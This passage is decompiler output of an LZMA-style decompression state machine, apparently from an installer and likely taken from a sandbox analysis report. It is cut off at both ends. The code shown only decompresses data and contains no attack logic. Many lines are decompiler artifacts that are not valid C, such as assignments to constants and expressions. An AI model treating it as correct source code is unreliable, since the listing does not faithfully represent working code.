						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
